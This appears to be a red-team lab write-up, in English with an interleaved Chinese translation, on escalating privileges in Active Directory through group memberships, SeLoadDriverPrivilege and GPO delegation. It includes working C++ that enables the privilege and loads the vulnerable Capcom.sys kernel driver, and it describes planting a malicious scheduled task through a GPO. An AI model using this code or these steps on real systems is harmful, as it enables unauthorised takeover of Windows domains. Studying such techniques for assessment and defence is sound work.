Administrators, Domain Admins, Enterprise Admins are well known AD groups that allow for privilege escalation, that pentesters and red teamers will aim for in their engagements, but there are other account memberships and access token privileges that can also be useful during security assesments when chaining multiple attack vectors. 管理员、域管理员、企业管理员是众所周知的 AD 组,它们允许权限升级,渗透测试人员和红队成员将在他们的参与中瞄准这些组,但还有其他帐户成员身份和访问令牌权限,在链接多个攻击媒介时,在安全评估期间也很有用。
Account Operators账户运营商
Allows creating non administrator accounts and groups on the domain 允许在域上创建非管理员帐户和组
Allows logging in to the DC locally 允许本地登录到 DC
Note the spotless’ user membership: 请注意一尘不染的用户成员身份:
However, we can still add new users: 但是,我们仍然可以添加新用户:
As well as login to DC01 locally: 以及在本地登录 DC01:
Server Operators服务器操作员
This membership allows users to configure Domain Controllers with the following privileges: 此成员身份允许用户使用以下权限配置域控制器:
Allow log on locally允许本地登录
Back up files and directories 备份文件和目录
Change the system time更改系统时间
Change the time zone更改时区
Force shutdown from a remote system 从远程系统强制关机
Restore files and directories 还原文件和目录
Shut down the system关闭系统
Note how we cannot access files on the DC with current membership: 请注意,我们无法访问具有当前成员资格的 DC 上的文件:
However, if the user belongs to Server Operators: 但是,如果用户属于 Server Operators :
The story changes:故事发生了变化:
Backup Operators备份操作员
As with Server Operators membership, we can access the DC01 file system if we belong to Backup Operators: 与 Server Operators 成员身份一样,如果我们属于 Backup Operators 以下类别, DC01 我们可以访问文件系统:
SeLoadDriverPrivilege
A very dangerous privilege to assign to any user – it allows the user to load kernel drivers and execute code with kernel privilges aka NT\System. See how offense\spotless user has this privilege: 分配给任何用户的非常危险的权限 – 它允许用户加载内核驱动程序并使用内核权限执行代码,又名 NT\System .查看用户如何 offense\spotless 拥有此权限:
Whoami /priv shows the privilege is disabled by default: Whoami /priv 显示默认情况下该权限处于禁用状态:
However, the below code allows enabling that privilege fairly easily: 但是,以下代码允许相当容易地启用该权限:
privileges.cpp
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
int main()
{
TOKEN_PRIVILEGES tp;
LUID luid;
bool bEnablePrivilege(true);
HANDLE hToken(NULL);
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
if (!LookupPrivilegeValue(
NULL, // lookup privilege on local system
L"SeLoadDriverPrivilege", // privilege to lookup
&luid)) // receives LUID of privilege
{
printf("LookupPrivilegeValue error: %un", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege) {
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
}
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES)NULL,
(PDWORD)NULL))
{
printf("AdjustTokenPrivileges error: %x", GetLastError());
return FALSE;
}
system("cmd");
return 0;
}
We compile the above, execute and the privilege SeLoadDriverPrivilege is now enabled: 我们编译上述内容,执行并启用权限 SeLoadDriverPrivilege :
Capcom.sys Driver Exploit Capcom.sys驱动程序漏洞
To further prove the SeLoadDriverPrivilege is dangerous, let’s exploit it to elevate privileges. 为了进一步证明它是 SeLoadDriverPrivilege 危险的,让我们利用它来提升特权。
Let’s build on the previous code and leverage the Win32 API call ntdll.NtLoadDriver() to load the malicious kernel driver Capcom.sys. Note that lines 55 and 56 of the privileges.cpp are: 让我们在前面的代码的基础上进行构建,并利用Win32 API调用 ntdll.NtLoadDriver() 来加载恶意内核驱动程序 Capcom.sys 。请注意,第 privileges.cpp 55 行和第 56 行是:
The first one declares a string variable indicating where the vulnerable Capcom.sys driver is located on the victim system and the second one is a string variable indicating a service name that will be used (could be any service) when executing the exploit: 第一个声明一个字符串变量,指示易受攻击的Capcom.sys驱动程序在受害系统上的位置,第二个是一个字符串变量,指示在执行漏洞利用时将使用的服务名称(可以是任何服务):
privileges.cpp
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <ntsecapi.h>
#include <stdlib.h>
#include <locale.h>
#include <iostream>
#include "stdafx.h"
NTSTATUS(NTAPI *NtLoadDriver)(IN PUNICODE_STRING DriverServiceName);
VOID(NTAPI *RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
NTSTATUS(NTAPI *NtUnloadDriver)(IN PUNICODE_STRING DriverServiceName);
int main()
{
TOKEN_PRIVILEGES tp;
LUID luid;
bool bEnablePrivilege(true);
HANDLE hToken(NULL);
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
if (!LookupPrivilegeValue(
NULL, // lookup privilege on local system
L"SeLoadDriverPrivilege", // privilege to lookup
&luid)) // receives LUID of privilege
{
printf("LookupPrivilegeValue error: %un", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege) {
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
}
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES)NULL,
(PDWORD)NULL))
{
printf("AdjustTokenPrivileges error: %x", GetLastError());
return FALSE;
}
//system("cmd");
// below code for loading drivers is taken from https://github.com/killswitch-GUI/HotLoad-Driver/blob/master/NtLoadDriver/RDI/dll/NtLoadDriver.h
std::cout << "[+] Set Registry Keys" << std::endl;
NTSTATUS st1;
UNICODE_STRING pPath;
UNICODE_STRING pPathReg;
PCWSTR pPathSource = L"C:\\experiments\\privileges\\Capcom.sys";
PCWSTR pPathSourceReg = L"\\registry\\machine\\System\\CurrentControlSet\\Services\\SomeService";
const char NTDLL[] = { 0x6e, 0x74, 0x64, 0x6c, 0x6c, 0x2e, 0x64, 0x6c, 0x6c, 0x00 };
HMODULE hObsolete = GetModuleHandleA(NTDLL);
*(FARPROC *)&RtlInitUnicodeString = GetProcAddress(hObsolete, "RtlInitUnicodeString");
*(FARPROC *)&NtLoadDriver = GetProcAddress(hObsolete, "NtLoadDriver");
*(FARPROC *)&NtUnloadDriver = GetProcAddress(hObsolete, "NtUnloadDriver");
RtlInitUnicodeString(&pPath, pPathSource);
RtlInitUnicodeString(&pPathReg, pPathSourceReg);
st1 = NtLoadDriver(&pPathReg);
std::cout << "[+] value of st1: " << st1 << "\n";
if (st1 == ERROR_SUCCESS) {
std::cout << "[+] Driver Loaded as Kernel..\n";
std::cout << "[+] Press [ENTER] to unload driver\n";
}
getchar();
st1 = NtUnloadDriver(&pPathReg);
if (st1 == ERROR_SUCCESS) {
std::cout << "[+] Driver unloaded from Kernel..\n";
std::cout << "[+] Press [ENTER] to exit\n";
getchar();
}
return 0;
}
Once the above code is compiled and executed, we can see that our malicious Capcom.sys driver gets loaded onto the victim system: 编译并执行上述代码后,我们可以看到我们的恶意 Capcom.sys 驱动程序被加载到受害者系统上:
10KB10KB存储
Capcom.sys
We can now download and compile the Capcom exploit from https://github.com/tandasat/ExploitCapcom and execute it on the system to elevate our privileges to NT Authority\System: 我们现在可以从 https://github.com/tandasat/ExploitCapcom 下载并编译 Capcom 漏洞并在系统上执行它,以将我们的权限提升到 NT Authority\System :
GPO DelegationGPO 委派
Sometimes, certain users/groups may be delegated access to manage Group Policy Objects as is the case with offense\spotless user: 有时,某些用户/组可能会被委派访问权限来管理组策略对象,就像 offense\spotless 用户一样:
We can see this by leveraging PowerView like so: 我们可以通过利用 PowerView 来了解这一点,如下所示:
The below indicates that the user offense\spotless has WriteProperty, WriteDacl, WriteOwner privileges among a couple of others that are ripe for abuse: 下面表明该用户 offense\spotless 具有 WriteProperty、WriteDacl、WriteOwner 权限以及其他几个容易被滥用的权限:
More about general AD ACL/ACE abuse refer to the lab: 有关一般AD ACL/ACE滥用的更多信息,请参阅实验室:
We know the above ObjectDN from the above screenshot is referring to the New Group Policy Object GPO since the ObjectDN points to CN=Policies and also the CN={DDC640FF-634A-4442-BC2E-C05EED132F0C} which is the same in the GPO settings as highlighted below: 我们知道上面屏幕截图中的上述 ObjectDN 指的是 New Group Policy Object GPO,因为 ObjectDN 指向 CN=Policies GPO 设置中的 CN={DDC640FF-634A-4442-BC2E-C05EED132F0C} GPO 设置,如下所示:
If we want to search for misconfigured GPOs specifically, we can chain multiple cmdlets from PowerSploit like so: 如果我们要专门搜索配置错误的 GPO,我们可以像这样链接来自 PowerSploit 的多个 cmdlet:
The above will add our user spotless to the local administrators group of the compromised box. Note how prior to the code execution the group does not contain user spotless:
Force Policy Update
ScheduledTask and its code will execute after the policy updates are pushed through (roughly each 90 minutes), but we can force it with gpupdate /force and see that our user spotless now belongs to local administrators group:
Under the hood
If we observe the Scheduled Tasks of the Misconfigured Policy GPO, we can see our evilTask sitting there:
Below is the XML file that got created by New-GPOImmediateTask that represents our evil scheduled task in the GPO:
The same privilege escalation could be achieved by abusing the GPO Users and Groups feature. Note in the below file, line 6 where the user spotless is added to the local administrators group – we could change the user to something else, add another one or even add the user to another group/multiple groups since we can amend the policy configuration file in the shown location due to the GPO delegation assigned to our user spotless:
Additionally, we could think about leveraging logon/logoff scripts, using registry for autoruns, installing .msi, edit services and similar code execution avenues.
